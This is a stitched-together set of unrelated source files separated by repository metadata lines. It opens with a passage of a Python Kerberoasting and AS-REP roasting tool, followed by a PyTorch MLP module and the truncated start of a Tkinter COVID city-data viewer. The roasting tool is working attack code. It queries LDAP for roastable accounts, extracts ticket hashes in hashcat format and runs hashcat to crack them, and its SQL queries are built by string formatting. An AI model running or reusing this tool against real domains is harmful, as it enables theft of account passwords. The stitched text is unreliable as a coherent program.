self.create_table(sql_np_table)
def commit(self):
self.conn.commit()
def create_table(self, create_table_sql):
""" create a table from the create_table_sql statement
:param conn: Connection object
:param create_table_sql: a CREATE TABLE statement
:return:
"""
try:
self.cursor.execute(create_table_sql)
except Error as e:
logger.info(e)
def find_np(self, domain, np):
samaccountname = np[0]
pwdlastsetDate = np[2].split(' ')[0]
npFound = True
cursor = self.cursor
npQuery = 'SELECT pwdLastSetDate FROM np WHERE samaccountname=\'{samAccountNameValue}\' AND domain=\'{domainValue}\''.format(samAccountNameValue=samaccountname, domainValue=domain)
npResult = cursor.execute(npQuery).fetchall()
if len(npResult) is 0:
logger.info(" ** NEW NP FOUND! Domain: "+domain+" sAMAccountName: "+samaccountname+", pulling the TGT.")
npFound=False
logger.info(" ** Adding the NP to the database.")
cursor.execute("INSERT INTO np (domain, sAMAccountName, pwdLastSetDate) VALUES (?,?,?)", (domain, samaccountname, pwdlastsetDate))
elif len(npResult) is 1:
if pwdlastsetDate != npResult[0][0]:
logger.info(" ** CHANGED PW FOUND! Domain: "+domain+" sAMAccountName: "+samaccountname+" old pwdlastsetDate value: "+npResult[0][0]+ " new pwdlastsetDate value: "+pwdlastsetDate)
cursor.execute("UPDATE np SET pwdLastSetDate=? WHERE sAMAccountName=?",(pwdlastsetDate, samaccountname))
npFound=False
else:
logger.info(" ** huh, more than 1 database match, something wrong here:")
logger.info(" ** domain: "+domain+" samaccountname "+ samaccountname + " pwdlastsetDate: " + pwdlastsetDate)
raise
self.commit()
return npFound
def find_spn(self, domain, spn, samaccountname, pwdlastset):
pwdlastsetDate = pwdlastset.split(' ')[0]
results=[]
cursor = self.cursor
spnQuery = 'SELECT pwdLastSetDate FROM spn WHERE servicePrincipalName=\'{spnValue}\' AND samaccountname=\'{samAccountNameValue}\' AND domain=\'{domainValue}\''.format(spnValue=spn, samAccountNameValue=samaccountname, domainValue=domain)
spnResult = cursor.execute(spnQuery).fetchall()
if len(spnResult) is 0:
logger.info(" ** NEW SPN FOUND! Domain: "+domain+" SPN: "+spn+" sAMAccountName: "+samaccountname)
samQuery = 'SELECT * FROM spn WHERE samaccountname=\'{samAccountNameValue}\' AND domain=\'{domainValue}\''.format(samAccountNameValue=samaccountname, domainValue=domain)
samResult = cursor.execute(samQuery).fetchall()
if len(samResult) is 0:
logger.info(" ** SAMAccount did not have a SPN registered yet, so going to pull the TGS.")
results.append(spn)
results.append(samaccountname)
else:
logger.info(" ** SAMAccount already had a SPN registered, so not going to pull the TGS.")
logger.info(" ** Adding the SPN to the database.")
cursor.execute("INSERT INTO spn (domain, servicePrincipalName, sAMAccountName, pwdLastSetDate) VALUES (?,?,?,?)", (domain, spn, samaccountname, pwdlastsetDate))
elif len(spnResult) is 1:
if pwdlastsetDate != spnResult[0][0]:
logger.info(" ** CHANGED PW FOUND! Domain: "+domain+" SPN: "+spn+" sAMAccountName: "+samaccountname+" old pwdlastsetDate value: "+spnResult[0][0]+ " new pwdlastsetDate value: "+pwdlastsetDate)
cursor.execute("UPDATE spn SET pwdLastSetDate=? WHERE sAMAccountName=?",(pwdlastsetDate, samaccountname))
results.append(spn)
results.append(samaccountname)
else:
logger.info(" ** huh, more than 1 database match, something wrong here:")
logger.info(" ** domain: "+domain+" spn: "+ spn + " samaccountname "+ samaccountname + " pwdlastsetDate: " + pwdlastsetDate)
raise
self.commit()
return results
class Roaster:
def __init__(self, username, password, user_domain, target_domain, cmdLineOptions):
self.__username = username
self.__password = password
self.__domain = user_domain
self.__targetDomain = target_domain
self.__lmhash = ''
self.__nthash = ''
self.__outputFileName = cmdLineOptions.outputfile
self.__usersFile = cmdLineOptions.usersfile
self.__aesKey = cmdLineOptions.aesKey
self.__doKerberos = cmdLineOptions.k
self.__requestTGS = cmdLineOptions.request
self.__kdcHost = cmdLineOptions.dc_ip
self.__saveTGS = cmdLineOptions.save
self.__requestUser = cmdLineOptions.request_user
if cmdLineOptions.hashes is not None:
self.__lmhash, self.__nthash = cmdLineOptions.hashes.split(':')
# Create the baseDN
domainParts = self.__targetDomain.split('.')
self.__baseDN = ''
for i in domainParts:
self.__baseDN += 'dc=%s,' % i
# Remove last ','
self.__baseDN = self.__baseDN[:-1]
# We can't set the KDC to a custom IP when requesting things cross-domain
# because then the KDC host will be used for both
# the initial and the referral ticket, which breaks stuff.
if user_domain != target_domain and self.__kdcHost:
logger.info('DC ip will be ignored because of cross-domain targeting.')
self.__kdcHost = None
def getMachineName(self):
if self.__kdcHost is not None and self.__targetDomain == self.__domain:
s = SMBConnection(self.__kdcHost, self.__kdcHost)
else:
s = SMBConnection(self.__targetDomain, self.__targetDomain)
try:
s.login('', '')
except Exception:
if s.getServerName() == '':
raise 'Error while anonymous logging into %s'
else:
try:
s.logoff()
except Exception:
# We don't care about exceptions here as we already have the required
# information. This also works around the current SMB3 bug
pass
return "%s.%s" % (s.getServerName(), s.getServerDNSDomainName())
@staticmethod
def getUnixTime(t):
t -= 116444736000000000
t /= 10000000
return t
def getTGT_ASREP(self, userName, requestPAC=True):
clientName = Principal(userName, type=constants.PrincipalNameType.NT_PRINCIPAL.value)
asReq = AS_REQ()
domain = self.__targetDomain.upper()
logger.info(" ** Getting the krb5asrep ticket of user: "+userName+" from domain: "+domain)
serverName = Principal('krbtgt/%s' % domain, type=constants.PrincipalNameType.NT_PRINCIPAL.value)
pacRequest = KERB_PA_PAC_REQUEST()
pacRequest['include-pac'] = requestPAC
encodedPacRequest = encoder.encode(pacRequest)
asReq['pvno'] = 5
asReq['msg-type'] = int(constants.ApplicationTagNumbers.AS_REQ.value)
asReq['padata'] = noValue
asReq['padata'][0] = noValue
asReq['padata'][0]['padata-type'] = int(constants.PreAuthenticationDataTypes.PA_PAC_REQUEST.value)
asReq['padata'][0]['padata-value'] = encodedPacRequest
reqBody = seq_set(asReq, 'req-body')
opts = list()
opts.append(constants.KDCOptions.forwardable.value)
opts.append(constants.KDCOptions.renewable.value)
opts.append(constants.KDCOptions.proxiable.value)
reqBody['kdc-options'] = constants.encodeFlags(opts)
seq_set(reqBody, 'sname', serverName.components_to_asn1)
seq_set(reqBody, 'cname', clientName.components_to_asn1)
if domain == '':
raise Exception('Empty Domain not allowed in Kerberos')
reqBody['realm'] = domain
now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
reqBody['till'] = KerberosTime.to_asn1(now)
reqBody['rtime'] = KerberosTime.to_asn1(now)
reqBody['nonce'] = random.getrandbits(31)
supportedCiphers = (int(constants.EncryptionTypes.rc4_hmac.value),)
seq_set_iter(reqBody, 'etype', supportedCiphers)
message = encoder.encode(asReq)
try:
r = sendReceive(message, domain, self.__kdcHost)
except KerberosError as e:
if e.getErrorCode() == constants.ErrorCodes.KDC_ERR_ETYPE_NOSUPP.value:
# RC4 not available, OK, let's ask for newer types
supportedCiphers = (int(constants.EncryptionTypes.aes256_cts_hmac_sha1_96.value),
int(constants.EncryptionTypes.aes128_cts_hmac_sha1_96.value),)
seq_set_iter(reqBody, 'etype', supportedCiphers)
message = encoder.encode(asReq)
r = sendReceive(message, domain, self.__kdcHost)
else:
raise e
# This should be the PREAUTH_FAILED packet or the actual TGT if the target principal has the
# 'Do not require Kerberos preauthentication' set
try:
asRep = decoder.decode(r, asn1Spec=KRB_ERROR())[0]
except:
# Most of the times we shouldn't be here, is this a TGT?
asRep = decoder.decode(r, asn1Spec=AS_REP())[0]
else:
# The user doesn't have UF_DONT_REQUIRE_PREAUTH set
raise Exception('User %s doesn\'t have UF_DONT_REQUIRE_PREAUTH set' % userName)
# Let's output the TGT enc-part/cipher in Hashcat format, in case somebody wants to use it.
self.writeASREP(self.__outputFileName,'$krb5asrep$%d$%s@%s:%s$%s' % ( asRep['enc-part']['etype'], clientName, domain,
hexlify(asRep['enc-part']['cipher'].asOctets()[:16]).decode(),
hexlify(asRep['enc-part']['cipher'].asOctets()[16:]).decode()))
def harvesterNPs(self):
if self.__usersFile:
self.request_users_file_TGTs()
return
if self.__doKerberos:
target = self.getMachineName()
else:
if self.__kdcHost is not None and self.__targetDomain == self.__domain:
target = self.__kdcHost
else:
target = self.__targetDomain
# Connect to LDAP
try:
ldapConnection = ldap.LDAPConnection('ldap://%s' % target, self.__baseDN, self.__kdcHost)
ldapConnection.login(self.__username, self.__password, self.__domain)
except ldap.LDAPSessionError as e:
if str(e).find('strongerAuthRequired') >= 0:
# We need to try SSL
ldapConnection = ldap.LDAPConnection('ldaps://%s' % target, self.__baseDN, self.__kdcHost)
ldapConnection.login(self.__username, self.__password, self.__domain)
else:
raise
# Building the search filter
searchFilter = "(&(UserAccountControl:1.2.840.113556.1.4.803:=%d)" \
"(!(UserAccountControl:1.2.840.113556.1.4.803:=%d))(!(objectCategory=computer)))" % \
(UF_DONT_REQUIRE_PREAUTH, UF_ACCOUNTDISABLE)
logger.info(" ** Searching LDAP for ASREP Roastable accounts")
self.answersNPs = []
try:
sc = ldap.SimplePagedResultsControl(size=1000)
resp = ldapConnection.search(searchFilter=searchFilter,
attributes=['sAMAccountName',
'pwdLastSet', 'MemberOf', 'userAccountControl', 'lastLogon'],
sizeLimit=0, searchControls = [sc], perRecordCallback=self.processRecordNP)
except ldap.LDAPSearchError as e:
logger.info(e.getErrorString())
if e.getErrorString().find('sizeLimitExceeded') >= 0:
logging.debug('sizeLimitExceeded exception caught, giving up and processing the data received')
pass
else:
raise
return self.answersNPs
def processRecordNP(self, item):
if isinstance(item, ldapasn1.SearchResultEntry) is not True:
return
mustCommit = False
sAMAccountName = ''
memberOf = ''
pwdLastSet = ''
userAccountControl = 0
lastLogon = 'N/A'
try:
for attribute in item['attributes']:
if str(attribute['type']) == 'sAMAccountName':
sAMAccountName = str(attribute['vals'][0])
mustCommit = True
elif str(attribute['type']) == 'userAccountControl':
userAccountControl = "0x%x" % int(attribute['vals'][0])
elif str(attribute['type']) == 'memberOf':
memberOf = str(attribute['vals'][0])
elif str(attribute['type']) == 'pwdLastSet':
if str(attribute['vals'][0]) == '0':
pwdLastSet = '<never>'
else:
pwdLastSet = str(datetime.datetime.fromtimestamp(self.getUnixTime(int(str(attribute['vals'][0])))))
elif str(attribute['type']) == 'lastLogon':
if str(attribute['vals'][0]) == '0':
lastLogon = '<never>'
else:
lastLogon = str(datetime.datetime.fromtimestamp(self.getUnixTime(int(str(attribute['vals'][0])))))
if mustCommit is True:
self.answersNPs.append([sAMAccountName,memberOf, pwdLastSet, lastLogon, userAccountControl])
except Exception as e:
logging.debug("Exception:", exc_info=True)
logging.error('Skipping item, cannot process due to error %s' % str(e))
pass
def request_multiple_TGTs(self, usernames):
for username in usernames:
try:
entry = self.getTGT_ASREP(username)
self.resultsNPs.append(entry)
except Exception as e:
logging.error('%s' % str(e))
def harvesterSPNs(self):
if self.__usersFile:
self.request_users_file_TGSs()
return
if self.__doKerberos:
target = self.getMachineName()
else:
if self.__kdcHost is not None and self.__targetDomain == self.__domain:
target = self.__kdcHost
else:
target = self.__targetDomain
logger.info(" ** Connecting to LDAP")
logger.debug("To LDAP server: "+target)
logger.debug("With BaseDN: "+self.__baseDN)
logger.debug("To KDC host: "+str(self.__kdcHost))
logger.debug("With auth domain: "+self.__domain)
logger.debug("And auth user: "+self.__username)
# Connect to LDAP
try:
ldapConnection = ldap.LDAPConnection('ldap://%s' % target, self.__baseDN, self.__kdcHost)
ldapConnection.login(self.__username, self.__password, self.__domain)
except ldap.LDAPSessionError as e:
if str(e).find('strongerAuthRequired') >= 0:
# We need to try SSL
ldapConnection = ldap.LDAPConnection('ldaps://%s' % target, self.__baseDN, self.__kdcHost)
ldapConnection.login(self.__username, self.__password, self.__domain)
else:
raise
filter_person = "objectCategory=person"
filter_not_disabled = "!(userAccountControl:1.2.840.113556.1.4.803:=2)"
searchFilter = "(&"
searchFilter += "(" + filter_person + ")"
searchFilter += "(" + filter_not_disabled + "))"
logger.info(" ** Searching LDAP for SPNs")
self.answersSPNs = []
try:
sc = ldap.SimplePagedResultsControl(size=1000)
resp = ldapConnection.search(searchFilter=searchFilter,
attributes=['servicePrincipalName', 'sAMAccountName',
'pwdLastSet', 'MemberOf', 'userAccountControl', 'lastLogon'],
sizeLimit=0, searchControls = [sc], perRecordCallback=self.processRecordSPN)
except ldap.LDAPSearchError as e:
logger.info(e.getErrorString())
if e.getErrorString().find('sizeLimitExceeded') >= 0:
logging.debug('sizeLimitExceeded exception caught, giving up and processing the data received')
pass
else:
raise
return self.answersSPNs
def processRecordSPN(self, item):
if isinstance(item, ldapasn1.SearchResultEntry) is not True:
return
mustCommit = False
sAMAccountName = ''
memberOf = ''
SPNs = []
pwdLastSet = ''
userAccountControl = 0
lastLogon = 'N/A'
delegation = ''
try:
for attribute in item['attributes']:
if str(attribute['type']) == 'sAMAccountName':
sAMAccountName = str(attribute['vals'][0])
mustCommit = True
elif str(attribute['type']) == 'userAccountControl':
userAccountControl = str(attribute['vals'][0])
if int(userAccountControl) & UF_TRUSTED_FOR_DELEGATION:
delegation = 'unconstrained'
elif int(userAccountControl) & UF_TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION:
delegation = 'constrained'
elif str(attribute['type']) == 'memberOf':
memberOf = str(attribute['vals'][0])
elif str(attribute['type']) == 'pwdLastSet':
if str(attribute['vals'][0]) == '0':
pwdLastSet = '<never>'
else:
pwdLastSet = str(datetime.datetime.fromtimestamp(self.getUnixTime(int(str(attribute['vals'][0])))))
elif str(attribute['type']) == 'lastLogon':
if str(attribute['vals'][0]) == '0':
lastLogon = '<never>'
else:
lastLogon = str(datetime.datetime.fromtimestamp(self.getUnixTime(int(str(attribute['vals'][0])))))
elif str(attribute['type']) == 'servicePrincipalName':
for spn in attribute['vals']:
SPNs.append(str(spn))
if mustCommit is True:
if int(userAccountControl) & UF_ACCOUNTDISABLE:
pass
else:
for spn in SPNs:
self.answersSPNs.append([spn, sAMAccountName, memberOf, pwdLastSet, lastLogon, delegation])
except Exception as e:
logger.info('Skipping item, cannot process due to error %s' % str(e))
pass
def getTGT(self):
try:
ccache = CCache.loadFile(os.getenv('KRB5CCNAME'))
except:
# No cache present
pass
else:
# retrieve user and domain information from CCache file if needed
if self.__domain == '':
domain = ccache.principal.realm['data']
else:
domain = self.__domain
logger.debug("Using Kerberos Cache: %s" % os.getenv('KRB5CCNAME'))
principal = 'krbtgt/%s@%s' % (domain.upper(), domain.upper())
creds = ccache.getCredential(principal)
if creds is not None:
TGT = creds.toTGT()
logger.debug('Using TGT from cache')
return TGT
else:
logger.debug("No valid credentials found in cache. ")
# No TGT in cache, request it
userName = Principal(self.__username, type=constants.PrincipalNameType.NT_PRINCIPAL.value)
# In order to maximize the probability of getting session tickets with RC4 etype, we will convert the
# password to ntlm hashes (that will force to use RC4 for the TGT). If that doesn't work, we use the
# cleartext password.
# If no clear text password is provided, we just go with the defaults.
if self.__password != '' and (self.__lmhash == '' and self.__nthash == ''):
try:
tgt, cipher, oldSessionKey, sessionKey = getKerberosTGT(userName, '', self.__domain,
compute_lmhash(self.__password),
compute_nthash(self.__password), self.__aesKey,
kdcHost=self.__kdcHost)
except Exception as e:
logger.debug('TGT: %s' % str(e))
tgt, cipher, oldSessionKey, sessionKey = getKerberosTGT(userName, self.__password, self.__domain,
unhexlify(self.__lmhash),
unhexlify(self.__nthash), self.__aesKey,
kdcHost=self.__kdcHost)
else:
tgt, cipher, oldSessionKey, sessionKey = getKerberosTGT(userName, self.__password, self.__domain,
unhexlify(self.__lmhash),
unhexlify(self.__nthash), self.__aesKey,
kdcHost=self.__kdcHost)
TGT = {}
TGT['KDC_REP'] = tgt
TGT['cipher'] = cipher
TGT['sessionKey'] = sessionKey
return TGT
def getTGS(self, answers):
if self.__requestTGS is True or self.__requestUser is not None:
# Let's get unique user names and a SPN to request a TGS for
users = dict( (vals[1], vals[0]) for vals in answers)
# Get a TGT for the current user
TGT = self.getTGT()
if self.__outputFileName is not None:
fd = self.__outputFileName
else:
fd = None
for user, SPN in users.items():
logger.info(" ** Getting TGS from user: "+user+" with SPN: "+SPN)
sAMAccountName = user
downLevelLogonName = self.__targetDomain + "\\" + sAMAccountName
try:
principalName = Principal()
principalName.type = constants.PrincipalNameType.NT_MS_PRINCIPAL.value
principalName.components = [downLevelLogonName]
tgs, cipher, oldSessionKey, sessionKey = getKerberosTGS(principalName, self.__domain,
self.__kdcHost,
TGT['KDC_REP'], TGT['cipher'],
TGT['sessionKey'])
self.outputTGS(tgs, oldSessionKey, sessionKey, sAMAccountName, self.__targetDomain + "/" + sAMAccountName, fd)
except Exception as e:
logger.debug("Exception:", exc_info=True)
logger.debug('Principal: %s - %s' % (downLevelLogonName, str(e)))
def writeASREP(self, fd, asrep):
writer = open(fd+"."+asrep.split('$')[2]+".krb5asrep", 'a')
writer.write(asrep + '\n')
writer.close()
def writeTGS(self, fd, tgs):
writer = open(fd+"."+tgs.split('$')[2]+".krb5tgs", 'a')
writer.write(tgs + '\n')
writer.close()
def outputTGS(self, tgs, oldSessionKey, sessionKey, username, spn, fd=None):
decodedTGS = decoder.decode(tgs, asn1Spec=TGS_REP())[0]
# According to RFC4757 (RC4-HMAC) the cipher part is like:
# struct EDATA {
# struct HEADER {
# OCTET Checksum[16];
# OCTET Confounder[8];
# } Header;
# OCTET Data[0];
# } edata;
#
# In short, we're interested in splitting the checksum and the rest of the encrypted data
#
# Regarding AES encryption type (AES128 CTS HMAC-SHA1 96 and AES256 CTS HMAC-SHA1 96)
# last 12 bytes of the encrypted ticket represent the checksum of the decrypted
# ticket
if decodedTGS['ticket']['enc-part']['etype'] == constants.EncryptionTypes.rc4_hmac.value:
entry = '$krb5tgs$%d$*%s$%s$%s*$%s$%s' % (
constants.EncryptionTypes.rc4_hmac.value, username, decodedTGS['ticket']['realm'], spn.replace(':', '~'),
hexlify(decodedTGS['ticket']['enc-part']['cipher'][:16].asOctets()).decode(),
hexlify(decodedTGS['ticket']['enc-part']['cipher'][16:].asOctets()).decode())
if fd is None:
logger.info(entry)
else:
self.writeTGS(fd, entry)
#fd.write(entry+'\n')
elif decodedTGS['ticket']['enc-part']['etype'] == constants.EncryptionTypes.aes128_cts_hmac_sha1_96.value:
entry = '$krb5tgs$%d$%s$%s$*%s*$%s$%s' % (
constants.EncryptionTypes.aes128_cts_hmac_sha1_96.value, username, decodedTGS['ticket']['realm'], spn.replace(':', '~'),
hexlify(decodedTGS['ticket']['enc-part']['cipher'][-12:].asOctets()).decode(),
hexlify(decodedTGS['ticket']['enc-part']['cipher'][:-12:].asOctets()).decode())
if fd is None:
logger.info(entry)
else:
self.writeTGS(fd, entry)
#fd.write(entry+'\n')
elif decodedTGS['ticket']['enc-part']['etype'] == constants.EncryptionTypes.aes256_cts_hmac_sha1_96.value:
entry = '$krb5tgs$%d$%s$%s$*%s*$%s$%s' % (
constants.EncryptionTypes.aes256_cts_hmac_sha1_96.value, username, decodedTGS['ticket']['realm'], spn.replace(':', '~'),
hexlify(decodedTGS['ticket']['enc-part']['cipher'][-12:].asOctets()).decode(),
hexlify(decodedTGS['ticket']['enc-part']['cipher'][:-12:].asOctets()).decode())
if fd is None:
logger.info(entry)
else:
self.writeTGS(fd, entry)
#fd.write(entry+'\n')
elif decodedTGS['ticket']['enc-part']['etype'] == constants.EncryptionTypes.des_cbc_md5.value:
entry = '$krb5tgs$%d$*%s$%s$%s*$%s$%s' % (
constants.EncryptionTypes.des_cbc_md5.value, username, decodedTGS['ticket']['realm'], spn.replace(':', '~'),
hexlify(decodedTGS['ticket']['enc-part']['cipher'][:16].asOctets()).decode(),
hexlify(decodedTGS['ticket']['enc-part']['cipher'][16:].asOctets()).decode())
if fd is None:
logger.info(entry)
else:
self.writeTGS(fd, entry)
#fd.write(entry+'\n')
else:
logger.error('Skipping %s/%s due to incompatible e-type %d' % (
decodedTGS['ticket']['sname']['name-string'][0], decodedTGS['ticket']['sname']['name-string'][1],
decodedTGS['ticket']['enc-part']['etype']))
if self.__saveTGS is True:
# Save the ticket
logger.debug('About to save TGS for %s' % username)
ccache = CCache()
try:
ccache.fromTGS(tgs, oldSessionKey, sessionKey )
ccache.saveFile('%s.ccache' % username)
except Exception as e:
logger.error(str(e))
if __name__ == "__main__":
#required args: db file, creds, target-domain file, outputfile
parser = argparse.ArgumentParser(add_help = True, description = "Query domains for SPNs that are configured and for users that have the property 'Do not require Kerberos preauthentication' set (UF_DONT_REQUIRE_PREAUTH). Monitor for changes and pull latest TGT or TGS tickets.")
parser.add_argument('-credentials', action='store', help='[required] domain/username[:password]', required=True)
parser.add_argument('-k', action="store_true", help='Use Kerberos authentication. Grabs credentials from ccache file '
'(KRB5CCNAME) based on target parameters. If valid credentials '
'cannot be found, it will use the ones specified in the command '
'line')
parser.add_argument('-aesKey', action="store", metavar = "hex key", help='AES key to use for Kerberos Authentication '
'(128 or 256 bits)')
parser.add_argument('-domainsfile', help='[required] File with domains (FQDN) per line to test', required=True)
parser.add_argument('-dbfile', help='[required] SQLite3 DB file to use as a database', required=True)
parser.add_argument('-crack', action='store', metavar = "wordlist", help='Automatically attempt to crack the TGS service ticket(s) using a dictionary attack with the provided wordlist (using Hashcat)')
parser.add_argument('-outputfile', action='store', help='Output file to write new or changed SPNs to. A date and timestamp will be appended to the filename as well as the encryption type ID of the TGS (23=rc4, 18=aes256, etc).')
parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')
options = parser.parse_args()
if len(sys.argv)==1:
parser.print_help(sys.stderr)
sys.exit(1)
if options.aesKey is not None:
options.k = True
if options.crack is not None and options.outputfile is None:
logger.info("Cannot use the crack option without outputting the results to files using the -outputfile option")
exit()
# enforcing default arguments
options.dc_ip = None
options.usersfile = None
options.request = True
options.save = False
options.request_user = None
options.hashes = None
logger = logging.getLogger('logger')
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
infoHandler = logging.FileHandler('info.log')
infoHandler.setLevel(logging.INFO)
infoHandler.setFormatter(formatter)
logging.getLogger().addHandler(infoHandler)
stdoutHandler = logging.StreamHandler(sys.stdout)
logging.getLogger().addHandler(stdoutHandler)
if options.debug is True:
debugHandler = logging.FileHandler('debug_' + datetime.datetime.now().strftime('%Y-%m-%d_%H-%M') + '.log')
debugHandler.setLevel(logging.DEBUG)
debugHandler.setFormatter(formatter)
logging.getLogger().addHandler(debugHandler)
logger.setLevel(logging.DEBUG)
logger.debug(version.getInstallationPath())
else:
logger.setLevel(logging.INFO)
authDomain, username, password = parse_credentials(options.credentials)
db = Database(options.dbfile)
try:
logger.info("Authenticating with domain: "+authDomain)
logger.info("With username: "+username)
logger.info("Loading domains from file: "+options.domainsfile)
logger.info("Storing state in: "+options.dbfile)
if options.outputfile is not None:
options.outputfile = options.outputfile + "_" + datetime.datetime.now().strftime('%Y-%m-%d_%H-%M')
logger.info("Outputting results in: "+options.outputfile)
if not os.path.exists(options.dbfile):
logger.info("*** DATABASE NOT FOUND")
db.create_database()
logger.info("*** DATABASE CREATED")
else:
logger.info("*** DATABASE FOUND")
db.connect_database()
with open(options.domainsfile) as fi:
domains = [line.strip() for line in fi]
for targetDomain in domains:
logger.info(" ** Starting enumerating domain: "+targetDomain)
roaster = Roaster(username, password, authDomain, targetDomain, options)
# KERBEROAST
spnAnswers = roaster.harvesterSPNs()
tgsList = []
for spn in spnAnswers:
logger.debug("Found SPN: "+spn[0])
newSpn = db.find_spn(targetDomain, spn[0], spn[1], spn[3])
if newSpn:
tgsList.append(newSpn)
if len(tgsList)>0:
roaster.getTGS(tgsList)
if options.outputfile is not None:
logger.info(" ** Results written to: "+options.outputfile+".XX.krb5tgs, where XX is the encryption type id of the ticket.")
else:
logger.info(" ** No new or changed SPNs found for domain: "+targetDomain)
# ASREP ROAST
npAnswers = roaster.harvesterNPs()
npsList = []
for np in npAnswers:
logger.debug("Found NP with sAMAccountName: "+np[0])
npFound = db.find_np(targetDomain, np)
if not npFound:
npsList.append(np)
if len(npsList)>0:
usernames = [answer[0] for answer in npsList]
roaster.request_multiple_TGTs(usernames)
if options.outputfile is not None:
logger.info(" ** Results written to: "+options.outputfile+".XX.krb5asrep, where XX is the encryption type id of the ticket.")
else:
logger.info(" ** No new or changed NPUsers found for domain: "+targetDomain)
logger.info(" ** Finished enumerating domain: "+targetDomain)
logger.info("Finished all domains")
if options.crack is not None:
if os.path.exists(options.outputfile+".23.krb5tgs"):
logger.info("[KERBEROAST] Starting to crack RC4 TGS tickets using wordlist: "+options.crack)
subprocess.run(["hashcat","-m13100","-a0",options.outputfile+".23.krb5tgs",options.crack,"--force"]).stdout
if os.path.exists(options.outputfile+".17.krb5tgs"):
logger.info("[KERBEROAST] Starting to crack AES128 encrypted TGS tickets using wordlist: "+options.crack)
subprocess.run(["hashcat","-m19600","-a0",options.outputfile+".17.krb5tgs",options.crack,"--force"]).stdout
if os.path.exists(options.outputfile+".18.krb5tgs"):
logger.info("[KERBEROAST] Starting to crack AES256 encrypted TGS tickets using wordlist: "+options.crack)
subprocess.run(["hashcat","-m19700","-a0",options.outputfile+".18.krb5tgs",options.crack,"--force"]).stdout
if os.path.exists(options.outputfile+".23.krb5asrep"):
logger.info("[ASREP-ROAST] Starting to crack RC4 encrypted TGT tickets using wordlist: "+options.crack)
subprocess.run(["hashcat","-m18200","-a0",options.outputfile+".23.krb5asrep",options.crack,"--force"]).stdout
except Exception as e:
import traceback
traceback.print_exc()
| 1.851563
| 2
|
skssl/predefined/mlp.py
|
YannDubs/Semi-Supervised-Neural-Processes
| 5
|
12784834
|
import warnings
import torch.nn as nn
from skssl.utils.initialization import linear_init
from skssl.utils.torchextend import identity
__all__ = ["MLP", "get_uninitialized_mlp"]
def get_uninitialized_mlp(**kwargs):
return lambda *args, **kargs2: MLP(*args, **kwargs, **kargs2)
class MLP(nn.Module):
"""General MLP class.
Parameters
----------
input_size: int
output_size: int
hidden_size: int, optional
Number of hidden neurones.
n_hidden_layers: int, optional
Number of hidden layers.
activation: torch.nn.modules.activation, optional
Unitialized activation class.
bias: bool, optional
Whether to use biaises in the hidden layers.
dropout: float, optional
Dropout rate.
"""
def __init__(self, input_size, output_size,
hidden_size=32,
n_hidden_layers=1,
activation=nn.ReLU,
bias=True,
dropout=0):
super().__init__()
self.input_size = input_size
self.output_size = output_size
self.hidden_size = hidden_size
self.n_hidden_layers = n_hidden_layers
if self.hidden_size < min(self.output_size, self.input_size):
self.hidden_size = min(self.output_size, self.input_size)
txt = "hidden_size={} smaller than output={} and input={}. Setting it to {}."
warnings.warn(txt.format(hidden_size, output_size, input_size, self.hidden_size))
self.dropout = (nn.Dropout(p=dropout) if dropout > 0 else identity)
self.activation = activation() # cannot be a function from Functional but class
self.to_hidden = nn.Linear(self.input_size, self.hidden_size, bias=bias)
self.linears = nn.ModuleList([nn.Linear(self.hidden_size, self.hidden_size, bias=bias)
for _ in range(self.n_hidden_layers - 1)])
self.out = nn.Linear(self.hidden_size, self.output_size, bias=bias)
self.reset_parameters()
def forward(self, x):
out = self.to_hidden(x)
out = self.activation(out)
out = self.dropout(out)
for linear in self.linears:
out = linear(out)
out = self.activation(out)
out = self.dropout(out)
out = self.out(out)
return out
def reset_parameters(self):
linear_init(self.to_hidden, activation=self.activation)
for lin in self.linears:
linear_init(lin, activation=self.activation)
linear_init(self.out)
| 2.640625
| 3
|
corona.py
|
yarinl3/Corona-Update
| 2
|
12784835
|
<gh_stars>1-10
import json
import requests
import tkinter as Tk
from tkinter import messagebox
from tkinter import simpledialog
from difflib import SequenceMatcher
import os
def similar(a, b):
return SequenceMatcher(None, a, b).ratio()
def main():
while True:
try:
try:
application_window.destroy()
except:
pass
application_window = Tk.Tk()
application_window.withdraw()
answer = simpledialog.askstring("Corona Update", "אנא הזן שם עיר או בחר מהרשימה:", parent=application_window)
if answer is None:
return None
url = 'https://data.gov.il/api/3/action/datastore_search?' \
'resource_id=8a21d39d-91e3-40db-aca1-f73f7ab1df69&sort=Date desc&limit=1&filters={"City_Name":\"' + answer + '\"}'
results = json.loads(requests.get(url).text)['result']['records'][0]
application_window.destroy()
break
except:
closest_city = ''
with open(r'cities.txt', 'r',encoding='utf8') as cities:
closest = 0
city = 'some string'
while city != '':
city = cities.readline().replace('\n', '')
similarity = similar(city, answer)
if similarity > closest:
closest = similarity
closest_city = city
messagebox.showinfo(f"שגיאה", f"שם עיר לא תקין\nאולי התכוונת ל: {closest_city}")
root = Tk.Tk()
f1 = Tk.Frame(root)
f2 = Tk.Frame(root)
root.wm_title('Corona Update')
root.resizable(width=False, height=False)
FONT = ('Arial', 20)
FONT2 = ('Arial', 16)
date = '/'.join(results['Date'].split('-')[::-1])
color = what_color(results['colour'])
Tk.Label(f2, text=":עיר", font=FONT).grid(row=0)
Tk.Label(f1, text=f"{results['City_Name']}", font=FONT).grid(row=0)
Tk.Label(f2, text=":צבע העיר", font=FONT).grid(row=1)
Tk.Label(f1, text=f"{results['colour']}", font=FONT, fg=color).grid(row=1)
Tk.Label(f2, text=":מספר החולה האחרון", font=FONT).grid(row=2)
Tk.Label(f1, text=f"{results['_id']}", font=FONT).grid(row=2)
Tk.Label(f2, text=":תאריך המקרה", font=FONT).grid(row=3)
Tk.Label(f1, text=f"{date}", font=FONT).grid(row=3)
Tk.Label(f2, text=":*חולים", font=FONT).grid(row=4)
Tk.Label(f1, text=f"{results['Cumulative_verified_cases']}", font=FONT).grid(row=4)
Tk.Label(f2, text=":*מחלימים", font=FONT).grid(row=5)
Tk.Label(f1, text=f"{results['Cumulated_recovered']}", font=FONT).grid(row=5)
Tk.Label(f2, text=":*מתים", font=FONT).grid(row=6)
Tk.Label(f1, text=f"{results['Cumulated_deaths']}", font=FONT).grid(row=6)
Tk.Label(f2, text=":*בדיקות", font=FONT).grid(row=7)
Tk.Label(f1, text=f"{results['Cumulated_number_of_tests']}", font=FONT).grid(row=7)
